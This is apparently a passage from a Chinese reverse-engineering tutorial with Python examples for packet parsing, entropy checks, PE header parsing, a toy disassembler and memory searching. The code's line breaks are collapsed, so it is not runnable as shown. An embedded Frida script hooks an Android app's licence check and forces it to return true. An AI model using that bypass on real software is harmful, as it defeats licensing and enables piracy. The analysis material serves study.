import binasciiclass ProtocolAnalyzer:def __init__(self):self.packet_count = 0def analyze_packet(self, data):"""分析数据包结构"""self.packet_count += 1print(f"\n=== 数据包 #{self.packet_count} ===")print(f"原始数据: {binascii.hexlify(data).decode()}")print(f"数据长度: {len(data)} 字节")# 尝试解析包头if len(data) >= 8:header = struct.unpack('>HHI', data[:8])print(f"可能的包头结构:")print(f" 字段1 (2字节): 0x{header[0]:04x} ({header[0]})")print(f" 字段2 (2字节): 0x{header[1]:04x} ({header[1]})")print(f" 字段3 (4字节): 0x{header[2]:08x} ({header[2]})")# 查找模式self.find_patterns(data)def find_patterns(self, data):"""查找数据中的模式"""# 查找重复字节for i in range(len(data) - 1):if data[i] == data[i + 1]:print(f"重复字节 0x{data[i]:02x} 在位置 {i}")# 查找可能的字符串try:text = data.decode('utf-8', errors='ignore')if any(c.isprintable() for c in text):print(f"可能的文本: {repr(text)}")except:pass# 使用示例
analyzer = ProtocolAnalyzer()# 模拟数据包
packets = [b'\x00\x01\x00\x10\x00\x00\x00\x20Hello World',b'\x00\x02\x00\x08\x00\x00\x00\x10Test',b'\x00\x03\x00\x0c\x00\x00\x00\x18Python'
]for packet in packets:analyzer.analyze_packet(packet)
2. 加密协议分析
加密检测脚本
import math
from collections import Counterdef entropy_analysis(data):"""计算数据熵值判断是否加密"""if not data:return 0# 计算字节频率counter = Counter(data)length = len(data)# 计算熵值entropy = 0for count in counter.values():p = count / lengthentropy -= p * math.log2(p)return entropydef detect_encryption(data):"""检测数据是否可能被加密"""entropy = entropy_analysis(data)print(f"数据熵值: {entropy:.2f}")if entropy > 7.5:print("高熵值 - 可能是加密或压缩数据")elif entropy > 6.0:print("中等熵值 - 可能是编码数据")else:print("低熵值 - 可能是明文数据")# 检查常见加密特征if len(data) % 16 == 0:print("数据长度是16的倍数 - 可能使用AES加密")if len(data) % 8 == 0:print("数据长度是8的倍数 - 可能使用DES/3DES加密")# 测试不同类型的数据
test_data = [b"Hello World! This is plain text.",b'\x8f\x3a\x9c\x2e\x7b\x1d\x4f\x6a\x9e\x2c\x8b\x5f\x1a\x7d\x3e\x9c',b"AAAAAAAAAAAAAAAA"
]for i, data in enumerate(test_data):print(f"\n--- 测试数据 {i+1} ---")detect_encryption(data)
静态分析
1. PE文件分析
PE解析脚本
import struct
import osclass PEAnalyzer:def __init__(self, filepath):self.filepath = filepathself.data = Noneself.dos_header = Noneself.nt_headers = Nonedef load_file(self):"""加载PE文件"""with open(self.filepath, 'rb') as f:self.data = f.read()def parse_dos_header(self):"""解析DOS头"""if len(self.data) < 64:return Falsedos_header = struct.unpack('<30H4s', self.data[:64])self.dos_header = {'e_magic': dos_header[0],'e_lfanew': dos_header[30]}# 检查DOS签名if self.dos_header['e_magic'] != 0x5A4D: # 'MZ'print("错误: 不是有效的PE文件")return Falseprint(f"DOS头解析成功")print(f"PE头偏移: 0x{self.dos_header['e_lfanew']:08x}")return Truedef parse_nt_headers(self):"""解析NT头"""pe_offset = self.dos_header['e_lfanew']# 检查PE签名pe_signature = struct.unpack('<I', self.data[pe_offset:pe_offset+4])[0]if pe_signature != 0x00004550: # 'PE\0\0'print("错误: PE签名无效")return False# 解析文件头file_header_offset = pe_offset + 4file_header = struct.unpack('<HHIIIHH', self.data[file_header_offset:file_header_offset+20])self.nt_headers = {'machine': file_header[0],'number_of_sections': file_header[1],'time_date_stamp': file_header[2],'characteristics': file_header[6]}print(f"机器类型: 0x{self.nt_headers['machine']:04x}")print(f"节数量: {self.nt_headers['number_of_sections']}")print(f"特征值: 0x{self.nt_headers['characteristics']:04x}")return Truedef find_strings(self, min_length=4):"""提取字符串"""strings = []current_string = ""for byte in self.data:if 32 <= byte <= 126: # 可打印ASCII字符current_string += chr(byte)else:if len(current_string) >= min_length:strings.append(current_string)current_string = ""return stringsdef analyze(self):"""完整分析"""print(f"分析文件: {self.filepath}")print(f"文件大小: {len(self.data)} 字节")if not self.parse_dos_header():returnif not self.parse_nt_headers():return# 提取字符串strings = self.find_strings()print(f"\n发现 {len(strings)} 个字符串:")for i, s in enumerate(strings[:10]): # 只显示前10个print(f" {i+1}: {s}")if len(strings) > 10:print(f" ... 还有 {len(strings) - 10} 个字符串")
2. 反汇编分析
简单反汇编器
import structclass SimpleDisassembler:def __init__(self):# x86指令映射(简化版)self.opcodes = {0x90: "nop",0xC3: "ret",0x50: "push eax",0x51: "push ecx",0x52: "push edx",0x58: "pop eax",0x59: "pop ecx",0x5A: "pop edx",0xB8: "mov eax, imm32",0xB9: "mov ecx, imm32",0xBA: "mov edx, imm32",}def disassemble(self, code, base_addr=0x1000):"""反汇编代码"""offset = 0instructions = []while offset < len(code):addr = base_addr + offsetopcode = code[offset]if opcode in self.opcodes:instruction = self.opcodes[opcode]size = 1# 处理带立即数的指令if "imm32" in instruction:if offset + 4 < len(code):imm = struct.unpack('<I', code[offset+1:offset+5])[0]instruction = instruction.replace("imm32", f"0x{imm:08x}")size = 5instructions.append(f"0x{addr:08x}: {instruction}")offset += sizeelse:instructions.append(f"0x{addr:08x}: db 0x{opcode:02x}")offset += 1return instructions# 测试代码
code = bytes([0x50, # push eax0xB8, 0x01, 0x00, 0x00, 0x00, # mov eax, 10x90, # nop0x58, # pop eax0xC3 # ret
])disasm = SimpleDisassembler()
instructions = disasm.disassemble(code)print("反汇编结果:")
for instr in instructions:print(instr)
动态分析
1. API监控
Windows API Hook
import ctypes
from ctypes import wintypes
import sysclass APIMonitor:def __init__(self):self.kernel32 = ctypes.windll.kernel32self.user32 = ctypes.windll.user32def hook_createfile(self):"""监控CreateFile API调用"""print("[*] 开始监控CreateFile API...")# 原始API地址original_createfile = self.kernel32.CreateFileWdef hooked_createfile(filename, access, share, security, creation, flags, template):print(f"[API] CreateFile调用:")print(f" 文件名: {filename}")print(f" 访问权限: 0x{access:08x}")print(f" 创建方式: 0x{creation:08x}")# 调用原始APIreturn original_createfile(filename, access, share, security,creation, flags, template)return hooked_createfile# 使用Frida进行动态分析的脚本
frida_script = """
// Frida JavaScript代码
Java.perform(function() {// Hook Android应用的关键函数var MainActivity = Java.use("com.example.app.MainActivity");MainActivity.checkLicense.implementation = function(key) {console.log("[+] checkLicense called with key: " + key);// 记录调用栈console.log("[+] Call stack:");Java.use("android.util.Log").getStackTraceString(Java.use("java.lang.Exception").$new());// 调用原始函数var result = this.checkLicense(key);console.log("[+] Original result: " + result);// 修改返回值console.log("[+] Returning true instead");return true;};// Hook加密函数var CryptoUtils = Java.use("com.example.app.CryptoUtils");CryptoUtils.decrypt.implementation = function(data) {console.log("[+] decrypt called with data: " + data);var result = this.decrypt(data);console.log("[+] Decrypted result: " + result);return result;};
});
"""
2. 内存分析
内存搜索脚本
import struct
import reclass MemoryAnalyzer:def __init__(self, memory_dump):self.memory = memory_dumpdef search_pattern(self, pattern):"""搜索内存中的模式"""matches = []if isinstance(pattern, str):pattern = pattern.encode()for i in range(len(self.memory) - len(pattern) + 1):if self.memory[i:i+len(pattern)] == pattern:matches.append(i)return matchesdef search_strings(self, min_length=4):"""搜索内存中的字符串"""strings = []# ASCII字符串ascii_pattern = rb'[\x20-\x7E]{' + str(min_length).encode() + rb',}'for match in re.finditer(ascii_pattern, self.memory):strings.append({'offset': match.start(),'string': match.group().decode('ascii'),'type': 'ASCII'})# Unicode字符串unicode_pattern = rb'(?:[\x20-\x7E]\x00){' + str(min_length).encode() + rb',}'for match in re.finditer(unicode_pattern, self.memory):try:string = match.group().decode('utf-16le')strings.append({'offset': match.start(),'string': string,'type': 'Unicode'})except:passreturn stringsdef find_crypto_constants(self):"""查找加密算法常量"""crypto_constants = {'AES S-Box': b'\x63\x7c\x77\x7b\xf2\x6b\x6f\xc5','MD5 Constants': b'\x01\x23\x45\x67\x89\xab\xcd\xef','SHA1 Constants': b'\x67\x45\x23\x01\xef\xcd\xab\x89',}found = []for name, constant in crypto_constants.items():matches = self.search_pattern(constant)if matches:found.append({'name': name,'offsets': matches})return found# 模拟内存数据
memory_data = (b"Hello World\x00\x00\x00\x00" +b"P\x00a\x00s\x00s\x00w\x00o\x00r\x00d\x00" + # Unicode "Password"b"\x63\x7c\x77\x7b\xf2\x6b\x6f\xc5" + # AES S-Box开头b"Secret Key: 12345\x00" +b"\x00" * 100
)analyzer = MemoryAnalyzer(memory_data)print("=== 内存分析结果 ===")# 搜索字符串
strings = analyzer.search_strings()
print(f"\n发现 {len(strings)} 个字符串:")
for s in strings:print(f" 0x{s['offset']:08x}: {s['type']} - {repr(s['string'])}")# 搜索加密常量
crypto = analyzer.find_crypto_constants()
print(f"\n发现 {len(crypto)} 个加密常量:")
for c in crypto:print(f" {c['name']}: {[hex(offset) for offset in c['offsets']]}")
免责声明: 本文所述技术方案仅用于学习和研究目的,请在合法合规的前提下使用相关技术。